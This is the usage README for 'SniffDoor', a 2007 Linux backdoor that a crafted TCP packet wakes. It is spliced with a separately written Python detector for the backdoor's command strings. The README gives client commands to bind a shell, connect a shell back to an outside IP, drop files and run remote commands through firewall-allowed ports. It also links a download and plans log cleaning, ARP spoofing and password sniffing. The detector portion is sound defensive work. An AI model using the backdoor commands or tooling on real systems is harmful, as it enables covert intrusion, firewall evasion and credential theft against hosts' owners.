Author: wzt
Original source: xsec.org
SniffDoor V 0.7a (c) 2007 by wzt <wzt@xsec.org>
+--------------------------------------------------+
Sniffdoor is a Linux backdoor that is woken up by a special
TCP packet. It can bind a shell with a tty, and it can carry
files inside TCP packets, which means the server side can
sniff your files out of the special TCP packets and save
them on the server. The client can also send a shell command
in the packet; the server sniffs it and executes it, so the
backdoor can get around the firewall.
+--------------------------------------------------+
[USAGE]:
server:
  type make;
  ./sniffdoor
client:
  type make;
  sniffdoor <options> [remote_ip] [port] [command]
<options>:
  -packet <remote_ip> [port] <command>
  -connect <remote_ip> <port>
  -listen <port>
<command>:
  bind:<port>
  back:<remote_ip>:<port>
  file:<filename>
  comm:<command>
1. bindshell:
send a TCP packet to host 61.155.217.56, and it then
binds a shell on port 999:
./client -packet 61.155.217.56 bind:999
./client -packet 61.155.217.56 22 bind:999
Port 22 is an active port on the host (the packet is
addressed to a port the firewall already allows).
2. connect-back door:
1). Your server must listen on a port first (your IP
is 123.45.64.57):
./client -listen 999
2). Send a TCP packet to host 61.155.217.56, and it then
binds a shell back to remote 123.45.64.57 on port 999:
./client -packet 61.155.217.56 back:123.45.64.57:999
./client -packet 61.155.217.56 21 back:123.45.64.57:999
3. send file:
1). Send a file with a TCP packet:
./client -packet 61.155.217.56 file:bind.c
./client -packet 61.155.217.56 80 file:bind.c
NOTE!
It can only send text files, not binary files.
If you fix this bug, mail me, thx.
4. execute command:
1). Execute a command with a TCP packet:
./client -packet 61.155.217.56 comm:"gcc -o bind bind.c"
./client -packet 61.155.217.56 23 comm:"gcc -o bind bind.c"
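The usage above defines the command grammar the backdoor reacts to (bind:<port>, back:<ip>:<port>, file:<filename>, comm:<command>) and notes that the wake-up packet is aimed at a port the host already serves, so it passes the firewall. From a defender's side that grammar is also the most concrete thing to look for. The following is an added example, not code from the SniffDoor project: a small Python triage heuristic that matches those command strings in captured TCP payloads, plus a helper that reads the Linux IFF_PROMISC bit from /sys/class/net/<iface>/flags, since a sniffing backdoor that opens the interface through libpcap typically leaves it in promiscuous mode. It assumes the command text travels unencrypted in the payload (the page does not say either way); classify_payload, scan_payloads, is_promiscuous and the sample payloads are all constructed for this example.

```python
import re
from typing import Optional

# Command grammar taken from the SniffDoor usage text:
#   bind:<port>   back:<ip>:<port>   file:<filename>   comm:<command>
# ASSUMPTION (not stated on the page): the command travels unencrypted
# in the TCP payload, so a substring/regex match on the payload is meaningful.
_PORT = r"(?:6553[0-5]|655[0-2]\d|65[0-4]\d{2}|6[0-4]\d{3}|[1-5]\d{4}|[1-9]\d{0,3})"
_IPV4 = r"(?:\d{1,3}\.){3}\d{1,3}"

COMMAND_PATTERNS = {
    "bind": re.compile(rb"bind:(?P<port>" + _PORT.encode() + rb")\b"),
    "back": re.compile(rb"back:(?P<ip>" + _IPV4.encode() + rb"):(?P<port>"
                       + _PORT.encode() + rb")\b"),
    "file": re.compile(rb"file:(?P<name>[\w./-]+)"),
    "comm": re.compile(rb'comm:"?(?P<cmd>[^"\r\n]+)"?'),
}


def classify_payload(payload: bytes) -> Optional[dict]:
    """Return a finding dict ({'kind': ..., plus captured fields}) if the
    payload matches SniffDoor command syntax, else None."""
    for kind, pat in COMMAND_PATTERNS.items():
        m = pat.search(payload)
        if m:
            fields = {k: v.decode(errors="replace") for k, v in m.groupdict().items()}
            return {"kind": kind, **fields}
    return None


def scan_payloads(payloads):
    """Run the heuristic over (src_ip, dst_port, payload) tuples.
    Returns a list of findings; the dst_port is kept because the page
    shows wake-up packets sent to legitimately open ports (22, 21, 80, 23)."""
    findings = []
    for src, dport, payload in payloads:
        hit = classify_payload(payload)
        if hit:
            findings.append({"src": src, "dport": dport, **hit})
    return findings


# Linux IFF_PROMISC flag bit, as exposed in /sys/class/net/<iface>/flags.
IFF_PROMISC = 0x100


def is_promiscuous(flags_hex: str) -> bool:
    """Interpret the text of /sys/class/net/<iface>/flags (e.g. '0x1103').
    Read that file per interface and pass its contents here."""
    return bool(int(flags_hex.strip(), 16) & IFF_PROMISC)


# Constructed sample payloads (made up for this example, not real traffic).
SAMPLE_PAYLOADS = [
    ("10.0.0.5", 22, b"SSH-2.0-OpenSSH_7.4\r\n"),
    ("10.0.0.9", 22, b"bind:999"),
    ("10.0.0.9", 21, b"back:123.45.64.57:999"),
    ("10.0.0.9", 80, b"file:bind.c"),
    ("10.0.0.9", 23, b'comm:"gcc -o bind bind.c"'),
    ("10.0.0.7", 80, b"GET /index.html HTTP/1.1\r\nHost: example.test\r\n\r\n"),
]

if __name__ == "__main__":
    for finding in scan_payloads(SAMPLE_PAYLOADS):
        print(finding)
    print("promisc (0x1103):", is_promiscuous("0x1103"))
```

The regexes are a triage aid, not a signature: a payload that happens to contain `bind:` followed by digits will also match, so findings are meant to be reviewed together with the destination port (a shell-command string arriving on port 22 or 80 is the suspicious part) and with a host check such as the promiscuous-flag reader above.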
+-----------------------------------------------------+
[THANKS]:
Thanks to baozi for testing the door all the time.
[END]:
Send any bug to <wzt@xsec.org>.
download:
http://wzt.wzt.googlepages.com/sniffdoor.tar
I plan to turn this into an all-in-one thing; please give suggestions on what other features a Linux backdoor + penetration program still needs (of course, the attack target can just as well be Windows).
My requirements:
1: bring a ttysniffer in --> extremely difficult.
2: port htran from Windows in, including socks5 (with username/password) --> somewhat difficult, e.g. client sends ip pack -proxy -bind eth0 port user pass --> in progress!
3: logcleaner --> easy job
4: portscanner with banner grabber --> the same
5: nbtenum for Windows --> easy job
6: bring in ARP spoofing + a network sniffer, to capture some plaintext passwords; if it could capture SMB it would be super strong --> moderate difficulty
7: mssql scan + mssql client --> easy job